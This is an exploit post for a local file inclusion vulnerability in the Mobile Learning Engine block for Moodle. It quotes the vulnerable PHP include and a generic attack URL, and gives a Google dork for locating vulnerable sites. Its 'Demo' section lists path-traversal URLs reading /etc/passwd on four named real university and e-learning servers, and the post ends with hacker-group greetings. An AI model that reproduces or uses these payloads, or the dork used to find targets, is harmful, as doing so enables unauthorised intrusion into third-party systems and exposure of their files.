facebook facebook twitter rss

Mobile Learning Engine (Moodle) v0.X.X.X Local File Inclusion Vulnerablity

Author: TUNISIAN CYBER , Published: 21-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Mobile Learning Engine (Moodle) v0.X.X.X Local File Inclusion Vulnerablity
[+] Date: 21-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/mle/
[+] Google Dork: inurl:"/blocks/mle/browser.php"
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
+Description:
The Mobile Learning Engine is a learning application for mobile phones written in Java (J2ME).
It enables you to use your phone at anytime and at anyplace for computer-aided, multimedia-based learning.
It is a content independent engine.

+Exploit:
Moodle suffers from a Local File Inclusion Vulnerablity.

[PHP]
if(isset($_GET["html"]))$html=$_GET["html"];
if($html==null&&isset($_POST["html"]))$html=$_POST["html"];
if($html==null&&!isset($_GET["xml"])&&!isset($_POST["xml"]))
.
.
.
include($CFG->dirroot .'/mod/' . $html);
[PHP]

127.0.0.1/[PATH]/blocks/mle/browser.php?html=[LFI]

+Fix:
No Fix until now..

Demo:
https://moodle.sgul.ac.uk/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd
http://moodle.ktu.lt/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd
http://www.e-learning.lk/vle/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd
http://www0.sun.ac.za/virtualnurse/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt, 5obzMtbga
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :